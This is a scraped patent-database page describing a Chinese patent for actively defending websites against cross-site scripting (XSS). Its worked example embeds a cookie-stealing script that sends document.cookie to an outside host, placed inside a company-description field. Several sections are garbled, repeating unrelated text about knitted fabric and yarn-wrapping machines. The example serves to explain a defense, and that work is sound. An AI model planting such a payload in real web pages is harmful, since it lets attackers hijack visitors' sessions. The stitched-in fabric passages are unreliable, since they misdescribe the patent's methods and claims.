Looking for breakthrough ideas for innovation challenges? Try Patsnap Eureka!

Method and device for generating data defense assembly for actively defending XSS (Cross Site Script) attack

An active defense and component technology, applied in the field of website security, can solve problems such as inability to effectively defend against XSS attacks, threat of website visitors, and inability to actively defend, so as to improve development efficiency, improve security, and reduce investment.

Active Publication Date: 2013-03-27
百卓网络科技有限公司
View PDF6 Cites 14 Cited by
  • Summary
  • Abstract
  • Description
  • Claims
  • Application Information

AI Technical Summary

Problems solved by technology

Because this method implants the analysis module and the XSS information database into the local computer, it is necessary to keep updating the XSS database from time to time, otherwise it cannot effectively defend against new XSS attacks, and this defense method is a passive defense, and the XSS information database is updated Th

Method used

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
View more

Image

Smart Image Click on the blue labels to locate them in the text.
Viewing Examples
Smart Image
  • Method and device for generating data defense assembly for actively defending XSS (Cross Site Script) attack
  • Method and device for generating data defense assembly for actively defending XSS (Cross Site Script) attack
  • Method and device for generating data defense assembly for actively defending XSS (Cross Site Script) attack

Examples

Experimental program
Comparison scheme
Effect test

example

[0094] In a website, registered users are allowed to enter their company introduction and product introduction for Internet promotion. In this case, malicious attackers are likely to embed XSS attack codes in the company introduction information or product introduction information.

[0095] For example, in Company Description enter:

[0096] "In 1996, the company started in Nanjing. For 15 years, it has always been adhering to the service concept of "providing customers with high-quality services". Can not live up to this trust and help customers achieve business success.

[0097] window.open('http: / / www.aabb.net / cookie.asp?msg='+document.cookie)

[0098] Today, as the largest private enterprise in China, the company still maintains an attitude of forging ahead and focusing on quality, and always adheres to independent development, cost optimization, and measures such as strengthening talent strategy and technological innovation to create a more optimized network and standar...

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
Login to View More

PUM

No PUM Login to View More

Abstract

The invention discloses a method and a device for generating a data defense assembly for actively defending XSS (Cross Site Script) attack. The method comprises the following steps of forming a simple data transmission target and adding a defense mark; customizing a defense compiler assembly code; inserting the defense compiler assembly code into a standard compiler assembly sequence; and forming the data defense assembly. The device comprises a data structure reading module, a defense code identifying module, a defense compiler, a standard compiler and a defense code management module, wherein the data structure reading module, the defense code identifying module, the defense compiler and the standard compiler are connected in sequence; and the defense code management module is connected with the defense compiler. By utilizing the method and the device, the defense code can be adjusted and expanded in time, so that a website can rapidly defend constantly changed XSS attack in real time. According to the method and the device, the generality is strong, the development efficiency of the website is greatly improved, and the security of the website is improved.

Description

technical field [0001] The invention belongs to the field of website security, in particular to a method and device for generating a data defense component for actively defending against XSS attacks. Background technique [0002] Among various website security vulnerabilities, cross-site scripting attacks (Cross Site Script, ie XSS attacks) are more serious. Cross-site scripting attack means that attackers insert malicious executable scripts (including javascript, flash, css, etc.) into vulnerable websites to trick users into executing them. Once the user browses this page, the malicious script embedded in it will be executed. In this way, the attacker can maliciously endanger the user, such as stealing various user accounts and controlling corporate data, including functions that can be read, tampered, added, and deleted. The ability of sensitive data of enterprises, theft of important and commercially valuable information of enterprises, illegal transfer of funds, forced ...

Claims

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
Login to View More

Application Information

Patent Timeline
no application Login to View More
IPC IPC(8): G06F21/56G06F17/30H04L29/06
Inventor 杨昕葛亮
Owner 百卓网络科技有限公司
Who we serve
  • R&D Engineer
  • R&D Manager
  • IP Professional
Why Patsnap Eureka
  • Industry Leading Data Capabilities
  • Powerful AI technology
  • Patent DNA Extraction
Social media
Patsnap Eureka Blog
Learn More
PatSnap group products